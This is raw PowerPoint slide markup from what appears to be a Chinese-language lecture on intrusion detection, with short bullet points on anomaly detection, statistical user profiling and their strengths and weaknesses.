                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2BB2087-B7DC-4E54-858C-23B0DB416387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88006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strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>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fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>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childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="23" presetClass="entr" presetSubtype="16"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p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="74"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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P spid="7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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2795017" y="3179576"/>
            <a:ext cx="633412" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
              <a:gd name="adj2" fmla="val 57269"/>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panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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异常检测的特点</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD177DF3-21B0-FC7B-614C-E8C43250A66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="2191396"/>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效率取决于用户轮廓的完备性和监控的频率</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRP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7" name="组合 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C768B8E-AED4-C59F-CB67-45E0ED8F57DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="3089506"/>
            <a:ext cx="8199755" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12913" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FFEE54-351A-D541-1D88-AE6C307B93AB}"/>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能够有效地检测未知入侵</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="组合 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD9BDD0-5946-5F6B-B812-F57888F8AE7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>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5" name="组合 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B7B42F8-EBD5-E94F-62D7-1AB26A8F8855}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="3938351"/>
            <a:ext cx="8199755" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12913" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA03853E-B4F3-9935-7FCC-31FE3EB70BA5}"/>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自我调整和优化</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="67" name="组合 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37872126-CC10-B81F-0339-CE8BD63B0E01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="75" name="图片 74">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C0B262-A14E-B8B7-5354-FADA85138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76" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084A37C5-4C7E-DC07-41EF-7535FC707D87}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B673CD-FE79-4645-5C86-F671C5DE4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75" y="3939118"/>
            <a:ext cx="3040631" cy="2028671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE7C9E2-5B70-4BAC-A162-82DB08EBDA69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33796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6460490" y="4597400"/>
            <a:ext cx="1663700" cy="1663700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373620" y="2712720"/>
            <a:ext cx="1541780" cy="1541780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9220835" y="4334510"/>
            <a:ext cx="1718310" cy="1718310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9220835" y="1212850"/>
            <a:ext cx="1605280" cy="2854960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8021320" y="3519170"/>
            <a:ext cx="1383030" cy="1789430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1786890" y="5308600"/>
            <a:ext cx="357632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入侵教程随处可见</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="746760" y="1924685"/>
            <a:ext cx="5875020" cy="3204845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6259830" y="1340485"/>
            <a:ext cx="1456690" cy="1830705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="标题 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381CCA53-EACC-4B22-884E-F0A955B0D9CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络入侵越来越容易了！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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2795017" y="2823220"/>
            <a:ext cx="633412" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
              <a:gd name="adj2" fmla="val 57269"/>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panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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统计分析异常检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD177DF3-21B0-FC7B-614C-E8C43250A66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="2105388"/>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对用户行为按照一定地频率进行采样</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRP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7" name="组合 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C768B8E-AED4-C59F-CB67-45E0ED8F57DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="2735030"/>
            <a:ext cx="8199755" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12913" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FFEE54-351A-D541-1D88-AE6C307B93AB}"/>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依据样本计算得到参数变量描述用户轮廓</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="组合 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD9BDD0-5946-5F6B-B812-F57888F8AE7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>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0" name="组合 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8193AB5-AAA7-2E49-D219-89DCB1C59259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="3934870"/>
            <a:ext cx="1118136" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F129DA55-343D-FB6C-412B-530340E232EA}"/>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8" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B018D4-38F1-C2AB-5480-E8F1FB1EA04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1" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C118A14-C7D1-D6DA-A131-82C5F09D9E88}"/>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优势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB7C10B-5512-1782-23A0-12389C62AAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="964303" y="4771825"/>
            <a:ext cx="2868295" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="4517" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A1DA32-CCE4-7E71-E6F6-517AF929644E}"/>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统计学方法非常成熟</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="组合 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F23CB99-EB51-45B7-4C7E-BDB3C49C6307}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="图片 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AE3172-1850-A34F-D6B7-89946902A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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE33040D-90DB-DB01-4B82-5FB1815CC9F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9" name="组合 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{675CE9CC-F70B-161D-9384-837EC96BE4DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="962061" y="5314183"/>
            <a:ext cx="2868295" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="4517" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFEC2020-4C0F-23FD-944E-60B69A3B4897}"/>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学习用户使用习惯</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="71" name="组合 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DDA9F6-4008-2762-7261-7718193F8A9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="72" name="图片 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F383D49-1BFF-5DAB-C9A9-6026E61A85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3" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3386BD-4CE9-789D-EA24-AE5CE37799B5}"/>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4" name="组合 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620B6FDF-4485-445A-A202-BEF0C9DBA629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5286880" y="3920674"/>
            <a:ext cx="1118136" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C08E8DC-C083-DA71-48E1-ADCB805ED79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8" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D280F5FF-01EB-D098-DBD2-DE53849B8DC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9" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7006A067-0F1D-0C2E-6D33-F47951D18B86}"/>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不足</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="组合 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED5CF8-5175-8748-80E4-1109A548CD66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="4644079"/>
            <a:ext cx="1991360" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3136" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4827B280-32A3-D217-04D0-5CF9E1594970}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
